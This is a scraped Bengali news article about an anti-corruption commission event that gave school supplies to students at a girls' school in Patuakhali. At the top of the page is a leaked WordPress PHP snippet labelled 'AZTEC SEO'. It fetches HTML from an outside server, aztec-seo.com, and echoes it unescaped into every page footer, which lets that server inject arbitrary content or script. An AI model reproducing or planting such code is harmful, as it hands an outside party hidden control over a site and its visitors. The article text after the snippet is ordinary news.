/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); পটুয়াখালীতে দুদক ও দুপ্রকের উদ্যোগে শিক্ষা উপকরণ বিতরণ | Dhaka Sky News

মেট্রোরেলের পল্লবী স্টেশন চালু

আগের সংবাদ

দেশের শীর্ষ ২০ ঋণখেলাপির তালিকা প্রকাশ

পরের সংবাদ

পটুয়াখালীতে দুদক ও দুপ্রকের উদ্যোগে শিক্ষা উপকরণ বিতরণ

পটুয়াখালী প্রতিনিধি

প্রকাশিত: January 25, 2023 , 10:59 am

পটুয়াখালীতে দুর্নীতি দমন কমিশন দুদক ও দুর্নীতি দমন প্রতিরোধ কমিটি দুপ্রক উদ্যোগে পটুয়াখালী শের-ই-বাংলা বালিকা উচ্চ বিদ্যালয়ে শিক্ষা উপকরণ ও মতবিনিময় সভা অনুষ্ঠিত।
২৪ জানুয়ারি মঙ্গলবার বেলা ১১ টায় বিদ্যালয়ের হলরুমে বিদ্যালয়ের সহকারী প্রধান শিক্ষক মোঃ নুরুল আমীরের সভাপতিত্বে ও দুপ্রক’র সদস্য শিরিন আক্তারের উপস্থাপনায় শিক্ষা উপকরণ বিতরণ ও মতবিনিময় হয়।
এতে প্রধান অতিথি ছিলেন দুদক পটুয়াখালীর উপ-পরিচালক মো. মামুনুর রশিদ। বিশেষ অতিথি হিসাবে বক্তব্য রাখেন দুর্নীতি প্রতিরোধ কমিটির সভাপতি প্রফেসর কে এম সহিদুল ইসলাম, জেলা শিক্ষা অফিসার মুহাম্মদ মজিবুর রহমান, দুদক পটুয়াখালী কার্যালয়ের উপ-পরিচালক মো. জাভেদ হাবিবি, দুপ্রক’র সাধারণ সম্পাদক অধ্যক্ষ আমিনুল ইসলাম সিরাজ।
মতবিনিময় সভা শেষে দুর্নীতি দমন কমিশনের সহায়তায় শের-ই-বাংলা বালিকা উচ্চ বিদ্যালয়ে পরিচালিত সততা সংঘের সদস্যদেরসহ দরিদ্র শিক্ষার্থীদের হাতে শিক্ষা উপকরণ তুলে দেন অতিথিরা।
এ সময় অন্যদের মধ্যে উপস্থিত ছিলেন সততা সংঘের সহ-সভাপতি সহকারী শিক্ষক অর্চনা রানী, সহ-সভাপতি সহকারী শিক্ষক নাসরিন আক্তার, ১০ম শ্রেণীর শিক্ষার্থী রেজওয়ানা ইসলাম রিতু, আয়শা সিদ্দিকা, আফিয়া জানান ও লামিয়া আক্তার, নবম শ্রেণীর উর্মি আক্তার, ৮ম শ্রেণীর শ্রেয় বিশ্বাস, ৭ম শ্রেণীর আফিয়া ইসরাতসহ বিদ্যালয়ের তিন শতাধিক ছাত্রী। দুর্নীতি মুক্ত বাংলাদেশ বিনির্মাণে শিক্ষার্থীদেরকে দক্ষ সু-নাগরিক হওয়ার আহবান জানান বক্তারা।